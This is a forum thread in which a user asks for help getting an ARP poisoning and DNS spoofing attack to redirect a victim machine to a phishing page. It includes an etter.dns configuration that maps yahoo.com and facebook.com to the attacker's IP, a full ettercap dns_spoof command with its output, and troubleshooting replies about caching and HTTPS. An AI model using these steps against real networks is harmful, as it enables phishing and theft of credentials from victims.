ARP poisoning and spoofind

First of all, it’s a bit confusing to understand which machine is meant so I will use the following abbreviations:
[list]
[] M1: The attacker
[] M2: The victim
[/list]

If I understood you correctly, you want to get to M1 localhost page via M2. This isn’t possible because 127.0.0.1 a.k.a. localhost refers always to your own machine (exception see below), so in case you visit localhost on M2 you get the M2 localhost page. (localhost is also known as loopback address). So the traffic never leave’s the victims (M2) PC. (And this is why you can access localhost web pages without having internet connection).

There is a possible solution, to change this localhost /loopback behaviour but this needs more access on your victims machine (incl. root access).

But when i fly over this tutorial, i don’t see a point that say’s “now visit localhost with the victims (M2) PC”. Instead you place a e.g. phising site and when M2 want’s to access this webpage (via the web browser) it show’s the page that is from M1.

[quote=author]If I understood you correctly, you want to get to M1 localhost page via M2. This isn’t possible because 127.0.0.1 a.k.a. localhost refers always to your own machine (exception see below), so in case you visit localhost on M2 you get the M2 localhost page. (localhost is also known as loopback address). So the traffic never leave’s the victims (M2) PC. (And this is why you can access localhost web pages without having internet connection).

There is a possible solution, to change this localhost /loopback behaviour but this needs more access on your victims machine (incl. root access)[/quote]Yes, I agree with that.

[quote=author]But when i fly over this tutorial, i don’t see a point that say’s “now visit localhost with the victims (M2) PC”. Instead you place a e.g. phising site and when M2 want’s to access this webpage (via the web browser) it show’s the page that is from M1.[/quote]
Sorry for my english, it’s not my first language…
For example :
In google, i write “test” and select the first link from M2, but it displays “This webpage is not available” whereas I want the M2 lead to on phishing site.

How i can do this ?
Thank you for your help :)

Nobody know?

I understood what you mean taslim and it’s possible, you can do something like that with the “host” file on windows computers so you can do that :

• Attacker do Arp Spoof
• He change google.com to his phishing webage
• When the victim go to google.com, he’ll see that the url is google.com but actually, he’ll be on the phishing page

Did you mean that ?

Thank you for your answer.

[quote=author]Did you mean that ?[/quote]
Yes, it’s that ! But when I go to the website “google.com” from my victim’s machine (M2), the phishing page not found. The browser displays me : “This webpage is not available”.
I don’t now why…. I followed the tutorial step by step and it isn’t the same result. Can you say me why ?

If you have a time, test for me and explain me.

Thanks.

Oh so you’ll love this website :

http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding-Man-in-the-Middle-Attacks-ARP-Part1.html

Good explanation of how works MITM and how to do some exercise :)

Hi,

Thanks your for your site.
I read “Understanding Man-In-The-Middle Attacks Part2: DNS Spoofing”.

it’s my etter.dns :
[quote=etter.dns]
yahoo.com A IP_ATTACK
*.yahoo.com A IP_ATTACK
[/quote]

Then run the command : sudo ettercap -i en0 -T -q -P dns_spoof -M arp ////
In my shell :
[quote=shell]
dns_spoof: A [www.yahoo.com] spoofed to [IP_ATTACK]
dns_spoof: A [fr.yahoo.com] spoofed to [IP_ATTACK]
[…]
[/quote]

But, in machine’s victim, it’s not phishing page which display, it’s the officiel page yahoo.com

Can you say me why please ?

If you had the browser open and visited the page before, the IP address has probably been cached.

You might want to check out Wireshark or something to get a better view, so you can figure most of this stuff out on your own.

Finally ! It’s work for the website which are not using https, it’s normal ?

Not sure what you’ve set up, but yes, HTTPS requires some more work.

I don’t understand, why for the protocol HTTPS that don’t work.
In the file etter.dns, for example :
[quote=author]
www.facebook.com A ATTACK’s IP
facebook.com A ATTACK’s IP
www.facebook.com PTR ATTACK’s IP
[/quote]
This attack, redirected the victim’s machine on server web (attack’s machine - phishing website) when the user write www.facebook.com or facebook.com in adress bar.
So, normally this attack bypass https because the user is redirected before load the true page.

Are you agree with that ?

It’s very hard for me to understand your sentences. All I can say is that what I meant is that to set up HTTPS you have to do some more work. (And if you don’t want to get certificate warnings/errors, it only gets a lot harder…)

Ok, thank you and sorry for my english.
I will return better ;)

@dloser I think he meant that when he want to do ARP / DNS spoof on his local network, he can’t do it with HTTPS website ( Google / Facebook / Hackthis … ).
[quote=dloser]
All I can say is that what I meant is that to set up HTTPS you have to do some more work
[/quote]
What about that “some more work” ? :)

@dloser, I think @Mugiwara27 meant that @taslim meant that when he want to do ARP / DNS spoof on his local network, he can’t do it with HTTPS website ( Google / Facebook / Hackthis … ).

Should be pretty clear now! ^^

Not sure why HTTP isn’t working for you, @tehron**; that is usually the easier protocol compared to HTTPS (which you did get to work, if I understood you correctly).